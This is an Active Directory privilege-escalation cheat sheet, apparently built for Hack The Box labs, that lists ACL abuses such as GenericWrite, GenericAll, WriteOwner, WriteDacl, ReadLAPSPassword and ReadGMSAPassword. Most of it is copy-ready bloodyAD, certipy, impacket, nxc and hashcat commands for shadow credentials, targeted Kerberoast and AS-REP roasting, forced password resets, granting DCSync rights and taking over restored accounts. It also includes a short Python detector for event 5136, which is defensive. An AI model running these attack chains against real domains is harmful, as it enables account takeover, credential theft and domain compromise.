AD ACL
User-GenericWrite
You have GenericWrite on a user object.
msDS-KeyCredentialLink
In this method we add a key credential (certificate) to the targeted user's msDS-KeyCredentialLink attribute and use it to authenticate over certificate-based protocols.
You can either use certipy to run the whole chain, or bloodyAD to add the shadow credential (it writes the generated certificate and private key to files) and then request a TGT with PKINITtools:
certipy shadow auto -username user@box.htb -p pass -account targeteduser -debug -scheme ldap
bloodyAD --host 'dc.box.htb' -d 'box.htb' -u 'user' -p 'pass' add shadowCredentials targeteduser
python3 PKINITtools/gettgtpkinit.py -cert-pem generated_cert.pem -key-pem generated_priv.pem box.htb/targeteduser targeteduser.ccache
If no TLS/PKINIT protocols are available and you get errors such as KDC_ERR_PADATA_TYPE_NOSUPP, you can try StartTLS on plain LDAP (port 389) instead:
git clone https://github.com/AlmondOffSec/PassTheCert.git /opt/git/PassTheCert
python3 /opt/git/PassTheCert/Python/passthecert.py -domain box.htb -dc-ip 10.129.75.247 -port 389 -crt generated_cert.pem -key generated_priv.pem
Targeted Kerberoast
We can set an SPN on the targeted user and perform the usual Kerberoast attack.
# Add SPN
bloodyAD -k --host 'DC01.BOX.HTB' --dc-ip '10.129.41.25' -d 'BOX.HTB' -u 'USER' set object TARGETEDUSER servicePrincipalName -v 'what/ever'
# Verify the SPN was written:
# bloodyAD -k --host 'DC01.BOX.HTB' --dc-ip '10.129.41.25' -d 'BOX.HTB' -u 'USER' get object TARGETEDUSER --attr servicePrincipalName
# Ask TGS
GetUserSPNs.py 'BOX.HTB'/'USER' -k -no-pass -dc-ip 'DC01.BOX.HTB' -dc-host 'DC01.BOX.HTB' -request-user TARGETEDUSER -outputfile /tmp/hashes.kerberoast
# Or nxc ldap DC01.BOX.HTB -d 'BOX.HTB' -u 'USER' -p 'PASS' --kerberoast /tmp/hashes.kerberoast
# Remove SPN
bloodyAD -k --host 'DC01.BOX.HTB' --dc-ip '10.129.41.25' -d 'BOX.HTB' -u 'USER' set object TARGETEDUSER servicePrincipalName
# Crack
hashcat -m 13100 -a 0 /tmp/hashes.kerberoast /usr/share/wordlists/rockyou.txt --potfile-path=HASHCATPOT
You can also use the targetedKerberoast tool, which automates this process:
targetedKerberoast adds an SPN to every user the current account can write to, requests the TGS, and finally removes the added SPN.
git clone https://github.com/ShutdownRepo/targetedKerberoast.git /opt/git/targetedKerberoast
pip3 install -r /opt/git/targetedKerberoast/requirements.txt
python3 /opt/git/targetedKerberoast/targetedKerberoast.py -v -d 'box.htb' -u 'user' -p 'pass'
# If you get clock skew errors, sync your clock with the DC (NTP)
# sudo rdate -n 10.129.75.247
Then crack the TGS hash with hashcat:
hashcat -m 13100 /tmp/hash /usr/share/wordlists/rockyou.txt --potfile-path=/home/user/HASHCATPOT
Targeted AS-REP
Very close to the targeted Kerberoast method:
we set the DONT_REQ_PREAUTH flag in the targeted user's userAccountControl and perform targeted AS-REP roasting.
bloodyAD -k --host 'DC01.BOX.HTB' --dc-ip '10.129.41.25' -d 'BOX.HTB' -u 'COMPROMISEDACCOUNT' add uac TARGETEDACCOUNT -f DONT_REQ_PREAUTH
[-] ['DONT_REQ_PREAUTH'] property flags added to TARGETEDACCOUNT's userAccountControl
GetNPUsers.py 'BOX.HTB'/'COMPROMISEDACCOUNT' -k -no-pass -dc-ip 'DC01.BOX.HTB' -dc-host 'DC01.BOX.HTB' -usersfile <(echo -e 'TARGETEDACCOUNT') -outputfile /tmp/hashes.asreproast -format hashcat
$krb5asrep$23$TARGETEDACCOUNT@BOX.HTB:xxxxxxxxxxxxxx
hashcat -m 18200 -a 0 hashes.asreproast /usr/share/wordlists/rockyou.txt --potfile-path=HASHCATPOT
Enable user
This is not an attack by itself, but you can enable a disabled account:
bloodyAD -k --host 'DC01.BOX.HTB' --dc-ip '10.129.41.25' -d 'BOX.HTB' -u 'USER' remove uac TARGETEDUSER -f ACCOUNTDISABLE
[-] ['ACCOUNTDISABLE'] property flags removed from TARGETEDUSER's userAccountControl
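A defender-side check for the writes these GenericWrite methods leave behind (it also goes beyond them to cover the DACL/owner changes of the WriteOwner and WriteDacl sections further down), as an added example that is not code from bloodyAD, certipy or any other tool on this page: it reviews constructed Windows Security event 5136 records for writes to msDS-KeyCredentialLink, servicePrincipalName, nTSecurityDescriptor and userAccountControl, pairing the old and new userAccountControl values to catch DONT_REQ_PREAUTH being set or a disabled account being re-enabled. It assumes object auditing (a SACL on the user objects) is enabled so that 5136 is logged at all.

```python
"""Flag the Windows Security event 5136 (directory object modified) writes that
the methods above leave behind. Added example, not code from any tool named on
this page; the records at the bottom are constructed samples."""
ACCOUNTDISABLE, DONT_REQ_PREAUTH = 0x0002, 0x400000   # userAccountControl bits
WATCHED = {  # attribute -> why a write by an unexpected principal matters
    "msDS-KeyCredentialLink": "shadow credentials written",
    "servicePrincipalName": "SPN written to a user (targeted Kerberoast)",
    "nTSecurityDescriptor": "DACL or owner changed (WriteDacl/WriteOwner)",
    "userAccountControl": "userAccountControl changed",
}

def uac_reason(old: int, new: int) -> "str | None":
    """Describe a userAccountControl transition worth alerting on, if any."""
    reasons = []
    if new & DONT_REQ_PREAUTH and not old & DONT_REQ_PREAUTH:
        reasons.append("DONT_REQ_PREAUTH set (AS-REP roastable)")
    if old & ACCOUNTDISABLE and not new & ACCOUNTDISABLE:
        reasons.append("disabled account re-enabled")
    return "; ".join(reasons) or None

def review(changes, trusted=frozenset()):
    """Return (subject, object_dn, reason) for each suspicious write.
    Records are (Subject Account Name, Object DN, Attribute LDAP Display Name,
    Value, Operation Type); a replace is logged as 'Value Deleted' (old value)
    followed by 'Value Added' (new value), so UAC records are paired up."""
    old_uac, findings = {}, []
    for subject, dn, attr, value, op in changes:
        if subject in trusted or attr not in WATCHED:
            continue
        reason = WATCHED[attr]
        if attr == "userAccountControl":
            if op == "Value Deleted":
                old_uac[(subject, dn)] = int(value)
                continue
            reason = uac_reason(old_uac.pop((subject, dn), 0), int(value))
            if reason is None:
                continue
        findings.append((subject, dn, reason))
    return findings

DN = "CN=targeteduser,OU=MYOU,DC=box,DC=htb"   # constructed sample records
SAMPLE = [
    ("user", DN, "msDS-KeyCredentialLink", "B:828:...", "Value Added"),
    ("user", DN, "servicePrincipalName", "what/ever", "Value Added"),
    ("user", DN, "userAccountControl", "514", "Value Deleted"),    # disabled
    ("user", DN, "userAccountControl", "4194816", "Value Added"),  # preauth off
    ("DC01$", DN, "servicePrincipalName", "HOST/x", "Value Added"),
]
```

Event 4738 (user account changed) carries the old and new userAccountControl values in a single record and is logged through the User Account Management audit subcategory, so it covers the same flag changes where no SACL is configured.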
User-GenericAll
GenericAll includes GenericWrite.
In addition to the GenericWrite actions, GenericAll allows you to set the password.
Set Password
If you have GenericAll access on a user, you can set the user's password.
(You probably want to try the GenericWrite methods first to retrieve the user's hash before losing it.)
From Windows
net user robert FNUEOFNSIDsilfelifsef_1 /domain
From Linux
# With password
bloodyAD --host 'DC.DOMAIN.HTB' -d 'DOMAIN.HTB' -u 'USER' -p 'PASS' set password VICTIM Pototo_123
# With NT HASH
bloodyAD --host 'DC.DOMAIN.HTB' -d 'DOMAIN.HTB' -u 'USER' -p ':NTHASH' set password VICTIM Pototo_123
User-WriteOwner
You can set VICTIM's owner to USER,
then grant USER rights on VICTIM.
bloodyAD --host 'DC.DOMAIN.HTB' -d 'DOMAIN.HTB' -u 'USER' -p 'PASS' set owner VICTIM USER
bloodyAD --host 'DC.DOMAIN.HTB' -d 'DOMAIN.HTB' -u 'USER' -p 'PASS' add genericAll VICTIM USER
#bloodyAD --host 'DC.DOMAIN.HTB' -d 'DOMAIN.HTB' -u 'USER' -p 'PASS' set password VICTIM Pototo_123
Group-WriteOwner
Change owner of “GROUP” to “USER”
bloodyAD --host 'DC.DOMAIN.HTB' -d 'DOMAIN.HTB' -u 'USER' -p 'PASS' set owner 'GROUP' 'USER'
Group-Owner
Grant “USER” genericAll right on “GROUP”
bloodyAD --host 'DC.DOMAIN.HTB' -d 'DOMAIN.HTB' -u 'USER' -p 'PASS' add genericAll 'GROUP' 'USER'
Group-GenericAll
Add “USER” to group “GROUP”
bloodyAD --host 'DC.DOMAIN.HTB' -d 'DOMAIN.HTB' -u 'USER' -p 'PASS' add groupMember 'GROUP' 'USER'
ReadLAPSPassword
Read the LAPS local administrator passwords:
nxc ldap 'DC.DOMAIN.HTB' -d 'DOMAIN.HTB' -u 'USER' -p 'PASS' --module laps
WriteDacl
Add any ACE you want, such as the DCSync rights:
bloodyAD --host 'DC.DOMAIN.HTB' -d 'DOMAIN.HTB' -u 'USER' -p 'PASS' set DCSync USER
ReadGMSAPassword
Retrieve the gMSA account's NT hash (from msDS-ManagedPassword):
bloodyAD -k --host 'DC01.BOX.HTB' --dc-ip '10.129.41.25' -d 'BOX.HTB' -u 'USER' -p 'PASS' get object 'GMSA01$' --attr msDS-ManagedPassword
nxc ldap BOX.HTB -u 'USER' -p 'PASS' --gmsa
WriteSPN
Perform the Targeted Kerberoast method described above.
Reanimate-Tombstones
You can reanimate (restore) deleted objects, but you probably need rights over the destination OU.
List deleted objects:
ldapsearch -H 'ldap://BOX.HTB' -D USER@BOX.HTB -w 'Pototo_123' -b "DC=BOX,DC=htb" "(isDeleted=*)" -v -E pr=1000/noprompt -E '!1.2.840.113556.1.4.417'
Resolve objectSid
$ cat <<'EOF'|python3
import base64, struct
b = base64.b64decode(b"AQUAAAAAAAUVAAAAArr/UoEu+1C7Lcd+VQQAAA==")   # objectSid as returned by ldapsearch
# b[0]: revision, b[1]: sub-authority count, b[2:8]: big-endian identifier authority, then 32-bit little-endian sub-authorities
subs = '-'.join(str(struct.unpack("<I", b[i:i+4])[0]) for i in range(8, len(b), 4))
print("S-%d-%d-%s" % (b[0], int.from_bytes(b[2:8], "big"), subs))
EOF
S-1-5-21-1392491010-1358638721-2126982581-1109
You can use https://github.com/charlesgargasson/acedump to list ACEs,
and dacledit to check the specific ACE between USER and a given SID:
dacledit.py -action 'read' -rights-guid 'bf9679c0-0de6-11d0-a285-00aa003049e2' -principal 'USER' -target-sid 'S-1-5-21-1392491010-1358638721-2126982581' "BOX.HTB"/"USER" -k -no-pass
PowerShell commands to find and restore the user by SID:
Get-ADObject -Filter {objectSid -eq "S-1-5-21-1392491010-1358638721-2126982581-1109"} -IncludeDeletedObjects
Get-ADObject -Filter {objectSid -eq "S-1-5-21-1392491010-1358638721-2126982581-1109"} -IncludeDeletedObjects | Restore-ADObject
If you have control over the destination OU, you can then leverage this access to gain control over the restored account.
Example for accounts that don't have adminCount set:
# Give ourselves FullControl over the OU
dacledit.py -action 'write' -rights 'FullControl' -inheritance -principal 'USER' -target-dn 'OU=MYOU,DC=box,DC=htb' 'box.htb'/'USER':'Pototo_1' -k
# Check if we have rights over targeted account
dacledit.py -action 'read' -principal 'USER' -target-dn 'CN=targeteduser,OU=MYOU,DC=box,DC=htb' 'box.htb'/'USER':'Pototo_1' -k
# Then leverage those rights, for example with shadow credentials
certipy shadow auto -username USER@box.htb -p Pototo_123 -account targeteduser -dc-ip 10.129.123.82 -ns 10.129.123.82